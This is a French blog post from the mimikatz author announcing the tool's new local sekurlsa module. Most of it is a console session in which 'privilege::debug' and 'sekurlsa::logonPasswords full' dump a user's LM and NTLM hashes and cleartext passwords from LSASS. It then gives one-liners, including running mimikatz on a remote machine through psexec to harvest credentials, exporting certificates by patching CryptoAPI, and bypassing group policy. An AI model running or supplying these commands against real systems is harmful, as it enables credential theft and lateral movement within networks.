mimikatz :: sekurlsa fait son apparition

homer_woohoole module local sekurlsa vient d’être incorporé à mimikatz !

La première version de sekurlsa (@) fonctionne par injection de la librairie susnommée, la deuxième (::) est un module local de mimikatz fonctionnant par lecture uniquement !

Après le dernier post sur l’injection de la librairie sekurlsa, puis celui sur la lecture des clés de déchiffrement depuis LSASS, il était temps de créer un nouveau module local : mimikatz :: sekurlsa

Nouvelle version !

Le nouveau mimikatz, en RC pour l’occasion, inclus donc ce nouveau module !
La version prenant en charge ce module est disponible : http://blog.gentilkiwi.com/mimikatz

sekurlsa_local

Il nécessite tout de même, sous NT6, le privilège debug pour lire des données du processus système LSASS :

mimikatz 1.0 x64 (RC)   /* Traitement du Kiwi (Aug  2 2012 01:32:28) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # sekurlsa::logonPasswords full

Authentification Id         : 0;234870
Package d'authentification  : NTLM
Utilisateur principal       : Gentil Kiwi
Domaine d'authentification  : vm-w8-rp-x
        msv1_0 :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
         * Hash NTLM    : cc36cf7a8514893efccd332446158b1a
        kerberos :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234/
        wdigest :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234/
        tspkg :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234/
        livessp :       n.t. (LUID KO)

L’aide de ce module sera bientôt disponible : http://blog.gentilkiwi.com/mimikatz/sekurlsa.
L’aide de la librairie a été déplacée : http://blog.gentilkiwi.com/mimikatz/librairies/sekurlsa.

Ligne de commande

Au passage, mimikatz peut maintenant prendre en compte ses commandes directement depuis ses arguments.
Quelques exemples sympas :

  • mimikatz privilege::debug "sekurlsa::logonPasswords full" exit
  • psexec \\windows-c -s -c c:\security\mimikatz\Win32\mimikatz.exe "sekurlsa::logonPasswords full" exit
  • mimikatz crypto::patchcapi crypto::exportCertificates exit
  • mimikatz nogpo::regedit exit

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *